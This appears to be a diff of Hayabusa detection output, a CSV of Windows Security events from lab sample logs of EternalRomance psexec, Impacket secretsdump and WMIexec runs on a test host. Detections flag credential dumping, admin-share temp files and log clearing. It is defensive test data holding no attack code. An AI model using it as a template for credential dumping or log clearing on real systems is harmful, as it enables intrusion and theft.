+2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\MS17_010_psexec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\MS17_010_psexec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\MS17_010_psexec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 60285  :  LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 60232  :  LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 50078  :  LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: SYSTEM32\BTeHLZkJ.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: SYSTEM32\NMdzZfem.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: SYSTEM32\BTeHLZkJ.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: SYSTEM32\NMdzZfem.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\Impacket secret dump.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP\DESKTOP.INI  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\Impacket secret dump.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\Impacket secret dump.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\Impacket secret dump.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\Impacket secret dump.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
+2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63558  :  LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63534  :  LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 50896  :  LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 56740  :  LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 44948  :  LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 44948  :  LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 44948  :  LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
